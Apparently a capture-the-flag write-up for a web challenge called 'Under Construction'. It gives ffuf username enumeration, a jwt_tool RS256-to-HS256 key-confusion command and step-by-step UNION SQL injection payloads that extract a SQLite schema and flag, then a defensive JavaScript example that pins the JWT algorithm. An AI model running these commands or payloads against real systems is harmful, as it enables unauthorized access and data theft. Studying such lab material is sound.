Under Construction

ffuf -request req -w ../../usernames.txt -mr exists -u http://209.97.132.64:32647/auth -s

Usernames: gale rosie

• Key Confusion [RS256 > HS256]
  ./jwt_tool.py -t http://209.97.132.64:32365/ -rc "session=[jwt]" -X k -pk ../../challenges/uc/pk -v
• sqlite_version()
  <> -I -pc username -pv "test123' union select 1,sqlite_version(),3 -- "
• table name
  -I -pc username -pv "test123' union select 1,(select tbl_name from sqlite_master limit 0,1),3 -- "
• column names [refer to the table create query in the output to check the column names]
  -I -pc username -pv "test123' union select 1,(select sql from sqlite_master limit 0,1),3 -- "
• flag
  -I -pc username -pv "test123' union select 1,(select <column-name> from <tname> limit 0,1),3 -- "

-------------------------------------------------
observations:
-------------------------------------------------
• JWT public key is present in the JWT token
• Enumerate usernames
• JWT key confusion due to accepting both RS256 and HS256
• SQLi is present on the getUser request as input is not escaped
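
The key-confusion observation above, shown from the verifier's side as an added example (not code from the challenge or from these notes): a check that takes `alg` from the token header beside one that pins RS256. The key pair, the function names and the `sample-user` payload are constructed for illustration.

```javascript
const { createHmac, createSign, createVerify, generateKeyPairSync,
        timingSafeEqual } = require('crypto');

const enc = (obj) => Buffer.from(JSON.stringify(obj)).toString('base64url');
const dec = (seg) => JSON.parse(Buffer.from(seg, 'base64url').toString());

// Constructed key pair standing in for the server's RSA keys (assumption).
const { publicKey, privateKey } = generateKeyPairSync('rsa', {
  modulusLength: 2048,
  publicKeyEncoding: { type: 'spki', format: 'pem' },
  privateKeyEncoding: { type: 'pkcs8', format: 'pem' },
});

// Helper for building sample tokens under a given algorithm and key.
function issue(alg, payload, key) {
  const input = `${enc({ alg, typ: 'JWT' })}.${enc(payload)}`;
  const sig = alg === 'HS256'
    ? createHmac('sha256', key).update(input).digest()
    : createSign('RSA-SHA256').update(input).sign(key);
  return `${input}.${sig.toString('base64url')}`;
}

function signatureOk(alg, input, sig, key) {
  if (alg === 'RS256') return createVerify('RSA-SHA256').update(input).verify(key, sig);
  if (alg !== 'HS256') return false;
  const mac = createHmac('sha256', key).update(input).digest();
  return mac.length === sig.length && timingSafeEqual(mac, sig);
}

// Weak: trusts the header's alg, so the RSA public key doubles as an HMAC secret.
function verifyHeaderAlg(token, key) {
  const [h, p, s] = token.split('.');
  return signatureOk(dec(h).alg, `${h}.${p}`, Buffer.from(s, 'base64url'), key) ? dec(p) : null;
}

// Hardened: the server pins one algorithm and rejects any other header value.
function verifyPinned(token, key, alg = 'RS256') {
  const parts = String(token).split('.');
  if (parts.length !== 3) return null;
  const [h, p, s] = parts;
  try {
    if (dec(h).alg !== alg) return null;
    return signatureOk(alg, `${h}.${p}`, Buffer.from(s, 'base64url'), key) ? dec(p) : null;
  } catch {
    return null; // malformed base64url or JSON
  }
}
```

Because the public key travels inside the token here, it cannot be treated as a secret; pinning the algorithm on the server is what closes the HS256 path.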
